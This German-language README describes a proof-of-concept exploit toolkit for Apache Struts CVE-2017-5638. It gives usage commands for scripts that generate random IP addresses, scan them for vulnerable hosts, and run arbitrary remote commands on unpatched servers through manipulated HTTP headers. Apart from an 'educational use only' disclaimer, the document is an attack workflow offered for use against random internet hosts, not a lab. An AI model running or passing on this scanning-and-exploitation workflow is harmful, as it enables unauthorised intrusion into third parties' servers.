
Proof-of-Concept-Exploit für Apache Struts CVE-2017-5638. Generiert zufällige IPs, scannt nach verwundbaren Hosts und führt Remote-Befehle über manipulierte HTTP-Header aus.
Dieses Projekt ist ein Proof-of-Concept für die Apache Struts Sicherheitslücke. Das Ziel war es, eine Software zu erstellen, die zufällige IP-Adressen generieren und auf die oben beschriebene Sicherheitslücke testen kann.
Nutzen Sie dieses Projekt auf eigenes Risiko und nur zu Bildungszwecken.
cURL
Nmap
Zufällige IP-Adressen generieren und in eine Textdatei speichern.
./get_ip.sh [Number of hosts to scan] [What port to scan] [Filename to write output]
./get_ip.sh 10000 80 output.txt
Auf Sicherheitslücke für eine bestimmte IP-Adresse prüfen.
./struts_check.sh [ip address] [port]
./struts_check.sh 127.0.0.1 80
Auf Sicherheitslücke für eine Liste von IP-Adressen prüfen.
./main.sh [Text file containing IP adresses] [Port]
./main.sh output.txt 443
Einen Befehl auf einem Server ohne den Apache Struts Sicherheitslücken-Patch ausführen
./struts_attack.sh [IP Adres] [Command]
./struts_attack.sh https://127.0.0.1 whoami